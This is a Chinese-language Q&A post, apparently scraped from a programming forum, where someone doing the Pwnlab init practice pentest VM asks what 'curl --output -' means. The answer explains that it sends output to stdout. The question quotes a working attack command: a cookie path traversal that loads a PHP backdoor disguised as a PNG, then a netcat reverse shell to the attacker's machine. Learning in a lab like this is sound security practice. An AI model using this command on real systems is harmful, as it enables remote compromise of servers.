【问题标题】:Understanding Curl Query了解卷曲查询
【发布时间】:2020-06-20 23:42:42
【问题描述】:

我在做一个名为 Pwnlab init 的实践渗透测试虚拟机时使用了以下 curl 查询。查询的目的是让index.php页面访问png文件,其实是一个伪装的php后门脚本,然后让被攻击机器发出netcat命令连接我的攻击机器。只有在研究了其他人如何成功完成虚拟机之后,我才知道使用此查询。我了解整个查询,除了第一部分curl --output -。有人可以帮我解决这部分查询的作用吗?

curl --output - -b lang=../upload/6a8c0c37efded4d620a5c59990f07b90.png \
http://xxx.xxx.xxx.xxx/index.php?cmd=/bin/nc+-e+/bin/sh+xxx.xxx.xxx.xxx+xxxx

【问题讨论】:

    标签: php curl penetration-testing reverse-shell


    【解决方案1】:

    将输出指定为-(单破折号)将强制完成输出 到标准输出。

    https://curl.haxx.se/docs/manpage.html#-o

    该选项通常是多余的,因为默认是标准输出。可能 在处理二进制数据时很有用。

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 2018-11-12
      • 2019-10-14
      • 1970-01-01
      • 1970-01-01
      • 2020-07-20
      相关资源
      最近更新 更多